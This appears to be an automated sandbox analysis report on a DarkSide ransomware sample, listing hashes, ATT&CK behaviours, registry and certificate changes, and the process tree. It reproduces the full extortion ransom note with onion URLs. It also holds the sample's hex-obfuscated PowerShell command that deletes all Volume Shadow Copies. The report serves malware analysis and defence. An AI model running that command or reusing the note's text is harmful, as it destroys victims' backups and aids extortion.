darkside | 4dcb5d42f6a37cb000de14de346978fa3a9f6a8cd4e41aaec3a15534cc726a1d

Analysis

max time kernel
65s
max time network
43s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
03-06-2023 07:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Darkside.exe
Size

59KB
MD5

cfcfb68901ffe513e9f0d76b17d02f96
SHA1

766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
SHA256

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
SHA512

0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c
SSDEEP

768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5

Score

10^/10

darkside persistence ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Admin\README.6a2c0f68.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 90 GB data. These files include: Finance data Insurance data Buchgalting Data Banking data and details, bank contracts, creditors info Much personal data Marketing data Production, Technik data Email conversations dump and more others. All documents are fresh (last 365 days) and stored on our offline servers. All data will be published piece by piece. First data pack will be published in 7 days if we do not come for agreement. Your personal leak page: http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF On the page you will find examples of files that have been stolen. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH When you open our website, put the following data in the input form: Key: rIzr2nCuqbQL7MGMwoppaucqSp5AZufUiYhssYa1SGfO0XFf09fBDlLDWgKQSnnvIAfqYTsOgUhOTxzbxGsC9nH0yk2HOFhn7t8ntX8L0evyce8vKdgUKF7Xvjn6ljaQQ4HPEfPZFP2jvN0DgBVWl2WgNT1U3owZ1bNBjps34t33ObZc01Ce1yKx5CSlwUYbw1ktjqt5d7R9DwRL3NIGrTHvMX3qXI5aBAUnirnc4zHtfGPXq4CuFoh04Tv7VE81aohfvuz8D7wo7i28sbILoJyF6mzeQwSkAXolOhXKQAEPsGcdbfLxfY5uILkHB3d1gAyxT1owQXsY4heNQbY3yYL1Em7dDaLdbNhOf0adYWFiFfAl9EwLDRT96L9Xzsk17ho1B82wOWZ79ZqtT8yqnZ4APJb1LO91ASSsgUdNvR0lAaZTfXHHxUI1vDm5ygyV7cbxMlrQ5K1U6ughdd5WosogMJWVNjreirhzuDzY6SnixtukGYG0D9azzgOHcgidJcLV4n0orhzIaA1SMNYOpdOIadgBehCaHwEyr3hn8CEa6fgpUgK6E95 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF

http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside
Renames multiple (130) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Darkside.exe

pid process

924 Darkside.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
924	Darkside.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies registry class 6 IoCs

Processes:

Darkside.exerundll32.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\6a2c0f68\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\6a2c0f68.ico"	Darkside.exe
Key created	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.6a2c0f68	Darkside.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.6a2c0f68\ = "6a2c0f68"	Darkside.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\6a2c0f68\DefaultIcon	Darkside.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\6a2c0f68	Darkside.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Darkside.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Darkside.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Darkside.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Darkside.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Darkside.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Darkside.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Darkside.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exechrome.exeDarkside.exe

pid process

1316 powershell.exe
1008 chrome.exe
1008 chrome.exe
924 Darkside.exe
924 Darkside.exe

pid	process
1316	powershell.exe
1008	chrome.exe
1008	chrome.exe
924	Darkside.exe
924	Darkside.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

Processes:

Darkside.exepowershell.exechrome.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	924	Darkside.exe
Token: SeSecurityPrivilege	924	Darkside.exe
Token: SeTakeOwnershipPrivilege	924	Darkside.exe
Token: SeLoadDriverPrivilege	924	Darkside.exe
Token: SeSystemProfilePrivilege	924	Darkside.exe
Token: SeSystemtimePrivilege	924	Darkside.exe
Token: SeProfSingleProcessPrivilege	924	Darkside.exe
Token: SeIncBasePriorityPrivilege	924	Darkside.exe
Token: SeCreatePagefilePrivilege	924	Darkside.exe
Token: SeBackupPrivilege	924	Darkside.exe
Token: SeRestorePrivilege	924	Darkside.exe
Token: SeShutdownPrivilege	924	Darkside.exe
Token: SeDebugPrivilege	924	Darkside.exe
Token: SeSystemEnvironmentPrivilege	924	Darkside.exe
Token: SeRemoteShutdownPrivilege	924	Darkside.exe
Token: SeUndockPrivilege	924	Darkside.exe
Token: SeManageVolumePrivilege	924	Darkside.exe
Token: 33	924	Darkside.exe
Token: 34	924	Darkside.exe
Token: 35	924	Darkside.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeBackupPrivilege	2372	vssvc.exe
Token: SeRestorePrivilege	2372	vssvc.exe
Token: SeAuditPrivilege	2372	vssvc.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe
Token: SeShutdownPrivilege	1008	chrome.exe

Suspicious use of FindShellTrayWindow 35 IoCs

Processes:

chrome.exe

pid	process
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

Processes:

chrome.exe

pid	process
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe
1008	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exeDarkside.exe

description	pid	process	target process
PID 1008 wrote to memory of 2000	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 2000	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 2000	1008	chrome.exe	chrome.exe
PID 924 wrote to memory of 1316	924	Darkside.exe	powershell.exe
PID 924 wrote to memory of 1316	924	Darkside.exe	powershell.exe
PID 924 wrote to memory of 1316	924	Darkside.exe	powershell.exe
PID 924 wrote to memory of 1316	924	Darkside.exe	powershell.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 840	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 608	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 608	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 608	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe
PID 1008 wrote to memory of 944	1008	chrome.exe	chrome.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Darkside.exe
"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5599758,0x7fef5599768,0x7fef5599778
2⤵
PID:2000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1380,i,9726067790594750551,11650438630861183804,131072 /prefetch:2
2⤵
PID:840

